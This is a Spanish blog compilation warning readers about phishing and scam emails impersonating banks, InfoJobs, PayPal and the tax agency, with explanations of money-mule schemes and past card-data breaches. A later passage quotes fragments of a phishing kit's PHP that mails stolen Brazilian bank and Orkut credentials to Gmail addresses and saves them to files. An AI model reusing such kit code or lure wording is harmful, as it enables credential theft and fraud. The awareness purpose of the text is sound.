Recientemente el portal de empleo Infojobs.net, ha avisado a través de su blog corporativo para alertar a los usuarios de que se están dando envios de ofertas de empleo, que utilizando el logo de la compañia, engañan al receptor. Este tipo de timo aprovecha la imagen de marca para conseguir la confianza de los receptores del email.

Estas ofertas falsas se han enviado indiscriminadamente (tanto a usuarios de InfoJobs como a otras personas). Para distinguir que se trata de una oferta falsa se debe estar atento a la dirección del remitente, a detalles como modificaciones de diseño respecto a los boletines legales enviados en anteriores ocasiones a usuarios con cuenta en Infojobs, asi como de que la verdadera compañia no solicita datos personales como claves bancarias ni exige pagos para inscribirse en ofertas.

El email desde el cual se envía no corresponde al de las comunicaciones habituales de InfoJobs.net. El “from” de un email de InfoJobs siempre tendrá esta estructura: xxx@xxx.infojobs.net.

El email está lleno de faltas ortográficas y, aunque utiliza el logo de InfoJobs.net, es diferente al diseño habitual de nuestras comunicaciones.

InfoJobs.net nunca os ofrecerá ofertas que requieran inversión económica, que soliciten datos bancarios y/o datos de acceso a nuestra web.

Para cualquier duda o consulta se puede escribir al servicio de Atención al candidato (gestiondatos@infojobs.net).

Ya hemos mostrado diferentes casos pero no está de más prevenir cuando hay intentos de fraude que tratan de aprovecharse de una situación particular. Creo que se dan varias cosas, por un lado que solamente podrian ser objetivos de este timo, personas con cuenta en Caja España como es obvio, pero aunque se reduzca a esta coincidencia, este enví­o de phishing se aprovecha de técnicas de ingenieria social como llamar a nuestra codicia (dinero ofrecido gratis para consumir), además de juntarse con unas fechas de alto consumo y una situación económica crítica para muchas familias.

Espero que no haya afectados, recomiendo leer los consejos de seguridad que aparecen en la web de Caja España.

También se da el caso de emails que prometen llevar al incauto a un sitio de citas o directamente una especie de agencia matrimonial que en realidad es una web scam que rapidamente pide dinero al usuario antes de dejarle entablar contacto con otros miembros de la comunidad.

A través del blog de seguridad informática de ESET Latinoamérica, me entero de que la práctica sigue en alza, con el tipico scam de las mujeres rusas que buscan encontrar un marido para ganar estabilidad fuera de su pais. El email en cuestion promete al usuario entrar en contacto con mujeres rusas solteras buscando marido y le dirige a una web que simplemente tiene una galeria superior de modelos que parecen nórdicas y un formulario a rellenar, pero ni rastro del formato normal de las comunidades de internet con perfiles de usuarios, novedades, noticias o blogs; solamente un formulario de registro.

Posteriormente, el usuario recibe por correo electrónico las credenciales de acceso a un portal que, como siempre, pide dinero a las víctimas, siendo en realidad toda la plataforma un engaño. El internauta que accede debe abonar dinero directamente para comunicarse con otras personas en la red. Algo que no tiene nada que ver con los sitios fiables de internet donde tienes acceso gratuito hasta un cierto punto y para algunas funcionalidades de la comunidad tienes que pagar un pequeño importe o una suscripción mensual para cuenta premium.

Google desarrolló una mayor protección en Gmail en relación con este tipo de ataques phishing, de modo que sitios como Ebay o Paypal tuviesen un mayor estudio de las tendencias de los scammers, seguramente gracias a eso tienen mucho conocimiento sobre los mails basura y como filtrarlos. Recientemente he recibido un email phishing que suplanta la identidad de Paypal, pero no es como los demás.

Gmail lo ha filtrado perfectamente a la carpeta de spam pero en este caso no incluye enlaces, se trata de un documento adjunto en formato html que abre la web de cebo donde salen instrucciones para recabar los datos de clientes y obtener sus claves. Normalmente ponen links a webs de cebo creadas para engañar simulando la web auténtica pero esto no lo habia visto.

Como puede verse en la captura del correo electrónico, el formato es diferente a los casos anteriormente denunciados y el tema va relacionado con recientes casos de phishing relacionados con reembolsos y devoluciones de dinero.

En mi caso personal, llevo usando Paypal durante más de dos años, solamente he tenido una disputa donde tuve que pedir una devolución. Compre un producto en una tienda online pero pasó un mes y no lo recibí­ en casa, asi que reclamé pero no me contestaban los mails ni al teléfono indicado en la tienda, asi que antes de que pasase más tiempo fui a abrir una reclamación en Paypal. Debo decir que pese a las criticas que hay en internet sobre Paypal, por sus comisiones y por sus cancelaciones de cuentas, a mi me ayudaron y me devolvieron el dinero que habia pagado. El proceso no fue complicado, tienes un seguimiento dentro de tu cuenta con las comunicaciones y los pasos a seguir bien explicados y lo más importante es que no incluye nada relacionado con el email de phishing.

Es decir que una vez más volvemos a las precauciones de siempre, ya que los emails de phishing tienen modos de operación que no concuerdan con los procedimientos de los sitios auténticos a los que suplantan. Ni los bancos piden claves por emails de alerta de seguridad, ni Paypal avisa de importes a devolver por correos electronicos con archivos html adjuntos.

La Agencia Tributaria (AEAT) ha advertido del fraude a través de Internet con el que se pretende recabar datos bancarios de ciudadanos, suplantando la identidad del organismo tributario. En un comunicado, la AEAT explicó que este intento de fraude se hace mediante comunicaciones a los correos electrónicos en las que se pretende hacer creer que es este organismo el que los enví­a, y que llegan bajo la dirección impuestos@aeat.es.

En mi caso personal, esta es una captura del email que he recibido, supongo que será similar al que habrán recibido otras personas:

Se puede observar como me avisan de que he sido uno de los “elegidos” para recibir una devolución, pero la dirección del enlace aparece en la barra de direcciones y no tiene relación con la AEAT.

El pasado mes de julio el Ministerio de Economía ya advirtió de la emisión masiva de este tipo de correo. El correo de phishing que suplanta a la Agencia Tributaria anuncia al destinatario un reembolso de impuestos inexistente y, para ello, le remite a una web en la que debe aportar datos de sus cuentas bancarias. La Agencia Tributaria advirtió de que “nunca solicita información confidencial, ni números de cuenta, ni números de tarjeta de los contribuyentes mediante correo electrónico”.

No es la primera vez que los delincuentes que actuan en internet se hacen pasar por el organismo fiscal para hacerse con el dinero de la gente. Según informaciones del diario online 20minutos, en el año 2005 se recibieron numerosas quejas y denuncias por una serie de llamadas en las que los interlocutores decían pertenecer a Hacienda y solicitaban datos bancarios.

El pasado julio el Ministerio de Economía ya advirtió de la emisión masiva de este tipo de correos. Entonces el mensaje era éste, según una de las afectadas por la estafa:

“Estimado Solicitante,

Después del último cálculo anual de su actividad fiscal hemos determinado que usted es elegible para recibir un reembolso de impuestos de 284.23 euros. Su numero de devolucion de impuestos: 2 7 9 0 2 1 6 8 1 5. Por favor rellene el formulario de pago se adjunta en el correo electronico.”

Espero que no haya afectados en esta ocasión, sentido común y sobretodo antes de confiar en un email sospechoso, mejor hacer una búsqueda por internet y no hacer click en ningún link ni dar información privada.

Leer aviso de seguridad en la nota de prensa de la Agencia Tributaria.

Esos mensajes que llegan a direcciones email, suelen tener avisos de seguridad solicitando al usuario que siga un enlace y rellene sus datos en un formulario, también se da el caso de una falsa promoción donde te regalan dinero sin saber de donde sale. Ambos han sido denunciados y son casos de phishing destinados a robar datos de cuentas bancarias de personas que sean posibles clientes.

Justo al iniciarse el mes de septiembre se ha dado otro aumento de phishing, donde también hay emails relacionadas con el banco BBVA, esta es la captura de imagen de un correo que he recibido, supongo que no soy el único:

Como puede observarse en la barra inferior, el enlace al que dirige el correo no es la web del banco, sino otro sitio más de cebo creado para captar las claves de incautos. Como de costumbre, en el email se mete prisa dando un tiempo limite en la alerta de seguridad, para presionar y no dejar que funcione el sentido común.

Tanto si eres cliente o no de BBVA, recuerda que los bancos no suelen actuar enviando esta clase de correos, no piden claves completas. Puedes denunciar este tipo de engaños y sencillamente borrar esta clase de spam sin prestarle atención y sin entrar en los enlaces del cuerpo del mensaje.

Albert Gonzales, un informático de 28 años de Miami, y sus colaboradores han sido acusados de irrumpir en las bases de datos de cinco compañías que utilizaban sistemas de procesamiento de pagos bancarios. Los números fueron robados de Heartland Payment Systems, un sistema de procesamiento de pagos con tarjeta y las cadenas de comercios 7-Eleven Inc y Hannaford Brothers Co. Las otras dos ví­ctimas no han sido identificadas. Heartland dio a conocer el robo a finales de enero. Durante su trayectoria fue utilizando diferentes alias de los cuales se conocen tres: ‘segvec’, ‘soupnazi’ y ‘j4guar17′.

Segun los fiscales, Gonzales y sus colaboradores se dirigieron a las mayores compañías escrutando la lista de la revista ‘Fortune’ de las 500 principales compañías y exploraron sus páginas web corporativas para identificar sus puntos flacos. Los sospechosos pretendían vender los datos a otros que los utilizasen para hacer compras fraudulentas.

Primero, los criminales fueron a establecimientos para identificar el tipo de máquinas de pago que utilizaban. “A partir de octubre de 2006, Gonzales y sus conspiradores investigaron los sistemas de tarjetas de crédito y débito empleados por sus víctimas; idearon un ataque mediante SQL Injection o inyección de código SQL para penetrar en sus redes y robar los datos de tarjetas de crédito y débito; y después enviaron esos datos a servidores que operaban en California, Illinois, Letonia, Holanda y Ucrania”, indica el Departamento de Justicia en una nota.

Un ataque por inyección SQL aprovecha una vulnerabilidad informática en el nivel de la validación de las entradas a la base de datos SQL de una aplicación, ya sea un software libre o comercial. El origen es el filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL. No es un ataque muy sofisticado o fuera de lo común, este error es de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que está incrustado dentro de otro. Una inyección SQL sucede cuando se inserta o “inyecta” un código SQL “invasor” dentro de otro código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el código “invasor” en la base de datos.

Por ejemplo, el tener instaladas extensiones de terceros dentro del nucleo de un software, puede ser un agujero para este tipo de ataques si la extensión instalada dentro de un núcleo seguro tiene vulnerabilidades. Por este motivo siempre se recomienda verificar cualquier extensión o plugin de un CMS o script.

Gonzales está en la cárcel desde mayo de 2008 a la espera de ser juzgado por otro ‘cribercrimen’ junto a varias personas. Le acusan de haber participado en el ‘crackeo’ de la base de datos de la cadena de restaurantes Dave & Busters.

Según informaciones en el diario Guardian, “Ninguno de sus métodos es revolucionario, se ven este tipo de técnicas en scams casi cada dia” declaró Graham Cluley, un consultor de la compañia de seguridad y tecnologia Sophos. Añadió que: “Parece que existiese un motivo para buscar unicamente grandes compañias y a su vez esta noticia ha descubierto sus carencias en protección de datos.”

En septiembre empezará este juicio y, el año que viene, está previsto que sea juzgado por el que iba a ser su gran golpe. Se enfrenta a una pena de 25 años de cárcel. Habia sido detenido anteriormente por robo de datos en tarjetas bancarias en el año 2003 pero se salvó de ser encarcelado aceptando ser informador y colaborador al servicio de agentes de seguridad americanos.

Desde Wired, se informaba también de que su tren de vida era altísimo y además de lograr grandes sumas en sus delitos, gastaba gran parte de su fortuna, valorada en $1.6 millones de dólares.

Habrá que ver si a otras personas les ocurre lo mismo pero en mis correos están llegando cada vez más emails basura, no solamente con publicidad no deseada, sino correos electronicos con diferentes artimañas para sacarle los ahorros a algún internauta despistado. Hablo de emails con premios astronómicos en loterias donde nunca hemos participado, regalos por parte de bancos, emails de seguridad donde nos piden nuestras claves bancarias o de paypal e incluso sospechosas ofertas de empleo muy bien remuneradas.

Paso a continuación a presentar algunos ejemplos, aunque los consejos para evitar estos fraudes, lamento que son los mismos de siempre, tener sentido común y usar la cabeza:

Este es un email de un premio de loteria, donde supuestamente soy el afortunado ganador de un premio millonario. Me piden mis datos personales y bancarios metiendome prisa con que si no lo hago antes del 25 de agosto el premio será cancelado. Evidentemente, si yo no he jugado a la loteria que mencionan ni le doy a los juegos de azar, esto no es posible y además no funciona asi. Por tanto se denuncia y se ignoran este tipo de emails trampa.

Atención a este correo porque seguro que a más de una persona le ha llegado. Es un scam donde se hacen pasar por el banco BBVA, como veis en el email sale esta imagen donde aseguran que te ha tocado un premio de 100 euros y que te lo dan sólo por ir a la página del BBVA e identificarte. Es curioso, no voy a entrar en ciertas ironí­as sobre el hecho de que los bancos no le regalan dinero a nadie, porque la clave está en esa solicitud: “sólo por identificarte”.

En las páginas web cebo de phishing, lo que uno se encuentra son webs copiadas de la original y auténtica, la que es legal, donde los ciberpiratas que roban los datos bancarios unicamente tienen funcionando el formulario donde esperan que la victima meta sus claves y se identifique. De ese modo los datos les llegan a un correo y el primo no sabe que ha pasado.

Recordemos que los bancos no piden nunca las claves completas y tampoco envian correos donde las direcciones de envio no son las habituales de la entidad, como por ejemplo: lo12@bbva-verano2009.es o servicios@bbva-verano2009.es

Además de esto, si observamos las diferencias entre la web de cebo y la web oficial, deberiamos ponernos en alerta ya que aunque son parecidas, no es todo igual. Las webs trampa de suplantación de identidad tienen errores, de código (casi todo copiado de la original mirando el código fuente de la web), ortográficos y de estructura.

La primera es la web a donde nos envia el email con la promocion de los 100 euros y la segunda es la web oficial del banco BBVA. Como se puede ver, una no tiene seguridad certificada con SSL, no sale https:// en la barra de dirección ni tenemos la conexión cifrada con el candadito en la barra inferior derecha; la oficial si la tiene. La de suplantación solamente habla de la promocion regalo de cientos de euros, señalando el formulario que es lo unico que funciona, esto está hecho para que los oportunistas con el norte nublado actuen rápido y no reflexionen. La web del BBVA no tiene tal promocion y además tiene muchos otros contenidos y servicios bancarios que prestan, no tienen un enfoque a algo concreto donde busquen la atención del usuario.

También me están llegando emails de suplantación de Caja Canarias, Bancaja y otros entidades pidiendome que me identifique mediante un formulario con claves para un servicio de mensajeria. Yo no tengo cuenta en estas entidades pero seguramente a alguien le llega y si que son clientes. Cuidado con hacer click en los enlaces que envian, no hagais ningun caso porque además los correos no llegan desde tales entidades, a mi me los ha enviado: barbara8642x@yahoo.com correo electrónico que desde luego no es de atención al cliente de las entidades bancarias.

Por último, me gustaria alertar sobre otro tipo de emails fraudulentos, los famosos emails scam de ofertas de empleo. Si tenemos cuenta en portales de empleo como Infojobs o Monster, entre otros, igual estamos acostumbrados a recibir boletines con nuevas ofertas de trabajo y podemos sentirnos tentados de picar en la trampa si necesitamos empleo y ahora con la crisis económica cuesta tener trabajo.

Sin embargo, hay que evitar a toda costa confundirse, las ofertas de trabajo no llegan de forma sospechosa al email si no hemos dado nuestros datos y además los envia una empresa que se identifica, no alguien con varios correos diferentes que nos pide todos nuestros datos sin dar a conocer de que trata el trabajo. Este es email que llega repetido en los ultimos meses:

Le saluda el coordinador de recursos humanos de la gran empresa internacional.

Nuestra empresa se dedica a la consultoria, el registro de las empresas, la apertura
de las cuentas bancarias en Europa y los inmuebles.

Ahora nos hacen falta los managers regionales en Espana.

Las condiciones del trabajo:

- el empleo parcial

- el sueldo fijo de 2000 euros al mes, mas comisiones

- el horario flexible

Si Usted esta interesado en la cooperacion con nuestra empresa – envienos su
curriculum vitae al E-mail Nombre@westunion-trabajo.net

Indica, por favor, la seguiente informacion:

Su nombre y apellido:

El pais:

La ciudad:

E-mail:

Movil:

!Atencion! La proposicion solamente para los residentes de Espana con el derecho
del trabajo en Espana.

Con los mejores votos

Lo que tienen en común estas sospechosas ofertas de empleo, son la oscuridad con la que hablan y ocultan su identidad, la posibilidad de hacer buenos ingresos y el hecho de que se trata con transferencias de dinero.

El SCAM o fraude a través de falsas ofertas de trabajo a distancia, es una mezcla de phishing y pirámide de valor, partiendo de una oferta de teletrabajo. La ví­ctima accede a una oferta de trabajo, en la que se le promete un porcentaje de rentabilidad por poner objetos relativamente caros de electronica de consumo a la venta en páginas de subastas o comerciales en Internet.

La tarea de la primera victima es realizar ventas, transferir posteriormente el dinero, reteniendo en ocasiones su porcentaje, a la teórica empresa para la que trabaja, que se encargará de enviar los aparatos a los compradores. Este intermediario está actuando de lo que se suele llamar mula o mulero, transportando el dinero del segundo estafado al delincuente. Los bienes teoricamente vendidos nunca son entregados.

El primer paso del fraude es engañar a un usuario logrando los datos y claves de sus cuentas bancarias mediante la falsificación de la página web de la entidad financiera a la que pertenece. Una vez conseguido esto captan a sus segundas ví­ctimas, conocidos como muleros.

Por medio de ofertas irresistibles de trabajo captan a los supuestos trabajadores, y de este modo los estafadores consiguen una cuenta corriente a su nombre para no tener que usar una cuenta propia para sus negocios fraudulentos. Mediante las claves conseguidas de la primera ví­ctima, los estafadores hacen un ingreso bancario de la cuenta del usuario estafado por phishing en la cuenta del mulero.

Una vez realizada la transferencia bancaria los estafadores avisan al mulero y le comunican que se quede un determinado porcentaje, el que será su comisión de trabajo, lo restante tiene que enviarlo mediante entidades de envío de dinero, a un destino que ellos le indican, ya sea mediante giros por Western Union u otro tipo de modos de envio de dinero. De esta forma no queda de los timadores ningún rastro. Sin embargo, los muleros si que quedan registrados ya que su cuenta es la que ha recibido la transferencia, son los verdaderos pringados de la estafa.

Al final las víctimas son tres, el estafado por phishing, el mulero y el banco que ha permitido la transferencia.

Medidas para evitar el phishing de las ofertas de empleo fraudulentas

• No confiar en correos electrónicos u otros mensajes electrónicos que se reciban solicitando aportaciones de dinero o información personal. Desconfiar de cualquier oferta que proporcione acceso fácil a cantidades importantes de dinero.
• Evitar acceder a información cuya fuente no sea confiable.
• No facilitar la cuenta de correo a desconocidos ni publicitarla en exceso por internet.
• No responder a mensajes falsos, ni a cadenas de correos para evitar que tu dirección se difunda.
• Utilizar el filtro anti-spam y marcar los correos no deseados como correo basura.
• No utilizar dinero en el pago de servicios o productos de los cuales no se posean referencias ni se pueda realizar el seguimiento de la transacción.
• Prestar atención al hecho de que cualquier compañi­a responsable, le llevará a un servidor seguro para que ingrese alli­ sus datos, cuando estos involucran su privacidad. Una forma de corroborar esto, es observar si la dirección comienza con https: en lugar de solo http://
• Recordar que practicamente ninguna institución responsable le enviará un correo electrónico solicitándole el ingreso de alguna clase de datos, que usted no haya concertado previamente.

Estos son algunos ejemplos de phishing que están tomando fuerza este verano, por lo que recomendamos tener mucho cuidado y usar la prudencia, sentido común antes de tratar con este tipo de correos sospechosos. Recordad que estos correos aprovechan el estado de crisis de personas que necesitan un empleo o generar ingresos porque están en crisis economica, son emails que buscan oportunistas a los que cazar y engañar.

McDonald’s alerta desde su página web sobre un caso de phishing oculto bajo una falsa encuesta de satisfacción, bastante similar al modo de operación de scam mencionado anteriormente. La popular multinacional americana ha dado la alerta sobre un correo electrónico que circula por Internet y que promete 50 euros de regalo por responder una sencilla encuesta sobre la satisfacción del cliente. McDonald’s ha colgado un comunicado en su página web indicando de que se trata de un e-mail fraudulento sobre el que no tiene ninguna responsabilidad.

El usuario recibe en su correo un e-mail bastante sospechoso teniendo en cuenta que podemos leer un texto que incluye varias faltas ortográficas y gramaticales, en el que se solicita la contestación a varias preguntas acerca de los establecimientos de la conocida cadena hamburguesas. El formato parece bastante creíble, aunque saltan a la vista detalles como los errores ortográficos, el dominio del remitente en el enlace y la bomba que lleva en la mano Ronald McDonald, el popular payaso que representa a la compañi­a.

En la encuesta se llega a solicitar un número de tarjeta de crédito y el pin de acceso para realizar la supuesta transferencia de 50 euros.

Lo de siempre, estar alerta, tener sentido común y si por casualidad nos llegan correos de este tipo y no son filtrados a la carpeta de correo basura o spam, ignorarlos, no hacer click en los enlaces y reportarlos a delitos telemáticos. Cuando se hace una transferencia de dinero nunca se piden las claves, seamos sensatos, nadie las pide, ni los bancos ni para recibir una nómina.

Visto gracias a: Tuexperto

La herramienta, que forma parte de Google Labs, reconoce una firma digital en todos los mensajes procedentes de eBay y PayPal. El sistema de autenticación que utiliza es DomainKeys, y todos los emails procedentes que no lleven la firma serán bloqueados por Gmail directamente.

Esta nueva función puede habilitarse desde Gmail, accediendo a Configuración y después a la pestaña Labs. La función se llama Icono de autenticación para remitentes verificados.

Durante los últimos años, las cifras de phishing se han disparado, sobretodo en correos que suplantan comunicados de bancos y cajas de ahorros. Además de entidades bancarias, Paypal ha sido una compañia de pagos electrónicos muy afectada por estos ataques, donde se enviaban emails a usuarios que podian ser victimas de robo de identidad. Los usuarios que abrí­an el email era redirigidos a una web externa a PayPal, donde introducí­an sus datos personales y contraseña. Como en otros casos de phishing el funcionamiento era sencillo, una vez conseguidas las claves en una web de cebo donde apenas funcionaba un formulario, los datos privados se enviaban a una cuenta donde los estafadores utilizaban las claves para sacar el dinero de las carteras virtuales.

La dificultad que tiene esta herramienta para tener éxito es que depende de una base de datos de dominios fraudulentos donde se instalan las webs trampa donde enlazan los correos de phishing. Habitualmente los scammers no solamente crean sus paginas con dominios propios sino que crackean sitios web totalmente legales y alojan discretamente paginas internas de phishing en webs que ignoran que sus sitios han sido hackeados y que estan alojando en su servidor directorios que contienen webs de phishing.

Por otra parte, es bueno que este tipo de herramientas sigan blindando los correos electrónicos además de favorecer el aumento de la cultura informática de los internautas que deben tener el sentido común y la cautela como primeras normas al ver un correo sospechoso, nunca dar sus datos personales ni claves bancarias ni hacer click en enlaces sin saber a donde se dirigen.

Nuevos avisos de mejoras en el blog de Gmail

Algunos usuarios que tenian su dirección de correo electrónico en una lista, recibieron un email de este tipo:

From: Pagos Fibertel [cobros2009@fibertel.com.ar]
To: ***********@fibertel.com.ar
Sent: Friday, June 12, 2009 12:55 AM
Subject: Problema con el cobro

Estimado Cliente/a.

Le comunicamos que debido a un problema en nuestro sistema de Cobros.
No ha sido posible realizar el cobro de los servicios del mes de Mayo
Debido a este inconveniente le solicitamos que verifique los datos de Facturación

Clique aqui para verificar sus datos.

Si Ud. ignora este correo y prefiere no verificar sus datos.
Procederemos a la suspensión de su Servicio.

Atte.

Como otros tantos emails de phishing, se pide a un usuario que de sus datos, sus claves de seguridad para ingresar en su panel. Como recomiendan todos los sitios bancarios y de envio de dinero, nunca ningún empleado de la compañia solicitará al cliente sus claves completas, por eso no hay que hacer ni caso a ningún correo que nos pida dar nuestras claves.

En este correo se le solicita al usuario que ingrese a una web supuestamente de Fibertel para verificar sus datos, la misma contiene un simple formulario para ser completado con la información de una tarjeta de crédito/debito. La dirección url no corresponde con el sitio real de Fibertel, sino con un sitio de cebo, es decir un sitio tapadera que copia el diseño y aspecto del sitio auténtico para que el usuario victima de fraude no note nada raro.

http://208.98.**2.**3/~maverick/fibertel/

Para cualquier usuario de Fibertel, por favor tengan cuidado y comuniquense con el servicio de atención al cliente si les llega un mensaje de este tipo.

Y es que ahora -y según el US-CERT- ya se han detectado varios cientos de mensajes de e-mail fraudulentos que usan a la gripe o influenza porcina como una nueva carnada para infectar a usuarios, usando la ya conocida ingenierí­a social en estos mensajes de correo para llevar a cabo ataques de phishing.

Estos mensajes de e-mail logran llamar la atención de los usuarios al contener en el subject o asunto algo sobre la gripe porcina, incluyendo en su interior un archivo adjunto o un enlace que si son abiertos redireccionan a un sitio web lleno de phishing, en donde cualquier visitante queda totalmente expuesto a ser infectado por este tipo de códigos maliciosos.

Sobre esto la compañia de seguridad informática Symantec ha informado que algunos de estos mensajes de correo electrónico incluyen un fichero PDF adjunto, que en apariencia no es más que un cuestionario con preguntas frecuentes sobre la gripe, aunque en realidad se trata del gusano “Bloodhound.Exploit.6” que inyecta diversos tipos de códigos maliciosos en el equipo de cómputo de la ví­ctima.

Por cierto, en Security by Default nos muestran algunas capturas de estos mensajes de Phishing.

Estos teléfonos fueron lanzados al mercado en el año 2003, a un precio inferior a 100 euros. Se convirtieron en uno de los modelos más populares de la marca finlandesa Nokia, que llegó a vender más de 200 millones de unidades del 1100 y sus sucesores en todo el mundo, de hecho fueron los modelos más usados por muchos adolescentes, aunque estos se dedicaban al envio de mensajes sms y a jugar al juego de la serpiente que venia con el teléfono.

El motivo por el que ahora se ha disparado su cotización no deja de resultar curioso. Al parecer, el software de ciertos modelos del Nokia 1100 permite interceptar las comunicaciones electrónicas de los bancos con sus clientes. Muchos bancos tienen un servicio de seguridad para las transferencias que exige la confirmación del cliente mediante sms, el mensaje contiene un código que debe ser insertado para confirmar las transferencias, las ordenes de envio de dinero no pueden completarse sin esta confirmación. Si realmente existiesen modelos de telefonia móvil capaces de interceptar dichas comunicaciones, el fraude podria ser muy peligroso, ya que los delincuentes podrian evitar envios de dinero y manipular otras ordenes de envio de dinero por transferencia bancaria.

La denuncia procede de la firma de seguridad holandesa Ultrascan Advanced Global Investigations, que empezó a investigar el asunto a partir de una consulta de la policía hace seis meses. Por entonces se empezaban a demandar estos teléfonos en ciertos foros de Internet y se pagaban 5.000 euros por ellos, cifra que ha ido aumentado, hasta niveles desorbitados, para cualquier tipo de terminal.

En realidad, los compradores estaban interesados únicamente en los teléfonos producidos en una fábrica de Bochum (Alemania), pues el software incluido en ellos puede ser manipulado para interceptar las contraseñas que los bancos envían a sus clientes para acceder a sus cuentas bancarias. Parecer ser que solamente los terminales salidos de dicha fábrica tienen el defecto que puede ser explotado.

Algunos bancos envían a sus clientes un código llamado por las siglas TAN (Transaction Authentication Number), que se utiliza una sola vez para completar una transacción. Para evitar los ataques de phishing, algunos bancos envían este código a través de un mensaje SMS, es algo que deben completar los clientes como paso extra de seguridad además de sus claves bancarias.

Es ahí donde entra en juego el Nokia 1100, que puede ser programado para suplantar el número de otra persona. De esta forma, el delincuente intercepta el código TAN y puede acceder a las operaciones bancarias de la víctima.

Según Ultrascan, varios grupos delictivos de Rusia, Marruecos y Rumania están llevando a cabo este tipo de operaciones, que han afectado a bancos de Alemania y Holanda.

Los atacantes modificaron los archivos index (php, html, etc.) agregando una porción de código Javascript que intenta explotar la vulnerabilidad en Microsoft Data Access Components (MDAC) que ejecutaba código de forma remota y descargar un virus troyano empaquetado con Themida. Agregaron además, tres carpetas con archivos que simulan ser la pagina de Orkut, red social muy usada por internautas de Brasil, Caixa Federal, Bradesco y algunas herramientas en PHP para atacar sitios web como c99shell.php. En todos estos casos los usuarios fueron redirigidos a dichas webs haciendo uso del envio de correos electrónicos con enlaces a los sitios web de cebo alojados en otros sitios web no fraudulentos pero con su seguridad comprometida tras el ataque de los crackers.

El robo de datos en la pagina de cebo que imitaba la red social Orkut se cometia invitando al usuario a visitar una comunidad de miembros VIP. Una vez ingresados los datos en la web falsa, los mismos eran enviados a una cuenta de correo de Gmail y a posteriori se redireccionaba al usuario a la comunidad antes mencionada.

// Configuracao de variaveis:
$mailto = e noisxx;
$mailtoaddr = so.alegriass@gmail.com;
$subject = /;
$redirectpage = http://www.orkut.com/Community.aspx?cmm=5554597;

Respecto al método usado para el fraude al banco Caixa Económica Federal, era similar aunque más peligroso porque no se trataba de los datos de acceso a un perfil de red social sino datos bancarios, claves para cuentas o tarjetas de crédito y débito. Para este banco el usuario es llevado hacia una copia de la web del banco en donde el único enlace funcional es el de la imagen que nos permite acceder a la banca en línea.

Los datos obtenidos son almacenados en archivos en texto plano cuyo nombre se corresponde con la fecha y hora del ingreso de la ví­ctima.

$today = date(”d-M-Y-H-i-s”);
$myFile = “../arquivos/” . $today.”.txt”;

Esta información es enviada además via email a la dirección dos casillas de correo de Gmail luego redirecciona a una página de error.

$para = o.alegriass@gmail.com, rcricardonb1@gmail.com;
$assunto = CaixaNew [ ". $ip_usuario. " ] œ;

La otra entidad bancaria afectada es Bradesco, en este caso el ataque dirige a una web de cebo que imita al sitio bancario auténtico y solicita la información de acceso a la banca al igual que los datos completos de la tarjeta necesaria para realizar operaciones en línea con este banco.

El sitio web era similar al de la entidad Bradesco salvo que unicamente funcionan los formularios creados para recolectar los datos privados de las victimas del fraude.

Una vez completados los datos son guardados y enviados por correo como en el caso anterior de Caixa Federal.
$today = date(d-M-Y-H-i-s);
$myFile = ../arquivos/ . $today..txt;

$para = so.alegriass@gmail.com;
$assunto = XDEXCO – . $ip_usuario. – . $today;
$boundary = strtotime(NOW);
$headers = From: XDESCO \r\n;
$headers .= De: XDESCO \r\n;
$headers .= To: $para <$para>\r\n;

Si conoces a algún brasileño o alguna persona que tenga cuenta en alguna de estas entidades avisale de este tipo de fraudes, seguro que te lo agradecerá.

movistar recargas

En este caso, se trata de un engaño para recargar el saldo del móvil para clientes Movistar, recargar el teléfono móvil o celular es sencillo, se puede hacer en tiendas, en cajeros y también online. Generalmente cuando recargamos el saldo hacemos pequeños ingresos, porque las personas que usan tarjeta prepago y no contrato, suelen buscar controlar el gasto, limitar el consumo mensual y poner el dinero justo que piensan gastar en llamadas y mensajes. Sin embargo, la suma de pequeños ingresos se puede convertir en una gran suma, si muchos incautos pican en un mail de phishing y van ingresando cantidades de entorno a 15 euros, por ejemplo.

De hecho, es peligroso hacer recargas a través de personas desconocidas porque podemos perder nuestro dinero pero también es peligroso tratar de recargar online interesados por una oferta recibida via mail y encontrarnos en un portal que imita el servicio online de Movistar.

Este es el correo que yo he recibido, supongo que a alguien más le sonará:

Si observais bien, hay que tener cuidado antes de hacer click en los enlaces de los mails de spam porque generalmente te redirigen a un sitio engañoso. En mi opinión, la página que aparece como el verdadero sitio enlazado debe ser una web personal crackeada donde han instalado el directorio de phishing, un modo de actuar idéntico en los ataques a gestores CMS con vulnerabilidades.

Puedes pasar meses sin darte cuenta de que estás alojando un directorio phishing en tu servidor. He tratado de contactar con el webmaster, pero no he conseguido avisarle todavía, también voy a ponerme en contacto con Movistar. Es importante avisar de estas cosas, nos pueden crackear el sitio a nosotros también y muchas personas pueden recibir mails engañosos, si suena la flauta igual resulta que alguno de los receptores de estos mails puede ser cliente de Movistar.

1. Educación, videos que tratan temas para instruir, que están en venta para uso personal o en sitios web.
2. Videos pedidos por prestigiosas compañias como Google, Ford y LinkedIn.

Entre ambos tipos de trabajo, han creado ya unos 30 videos que superan los 10 millones de vistas en internet. Debido a nuestra temática, la seguridad informática, el video que nos interesa es un tutorial sobre como reconocer el phishing y evitar caer en la trampa del fraude electrónico. En menos de 3 minutos, el video muestra:

• Un ejemplo de como funciona el scam habitualmente
• Como reconocer y reportar un email de phishing
• Que hacer cuando hemos recibido un ataque de phishing
• Que hacer en caso de haber divulgado nuestra información

El videotutorial está en inglés pero gracias a Martín Aberastegue, se puede ver también con subtítulos en español:

Kjell J. Hole, catedrático de la Universidad de Bergen al sur de Noruega y sus estudiantes de doctorado han realizado ataques informáticos a bancos de este país que operan por Internet para demostrar los problemas de seguridad de estos sistemas, según un informe en Computer World.

Durante 9 meses, Hole y su equipo sabotearon de forma continua el sistema de dos bancos donde tenían cuentas mediante la práctica que consiste en el envío masivo de mensajes electrónicos que fingen ser oficiales y que buscan hacerse con información del usuario, en este caso, con su identificador electrónico.

“La seguridad mediante autenticación es muy débil, hemos demostrado que es posible robar la identidad. Para ello, sólo hemos necesitado pensar como criminales y utilizar técnicas de ataque conocidas”, declaró Hole a la edición noruega de esta revista informática.

Hole, que trabaja en el Centro de Investigación para Teoría de los Códigos y Criptología de la Universidad de Bergen, señaló que había informado a la Oficina de Estandarización de Bancos (BSK) y a las propias entidades bancarias del déficit de seguridad desde el inicio de su investigación y que realizó los ataques porque no le hicieron caso.

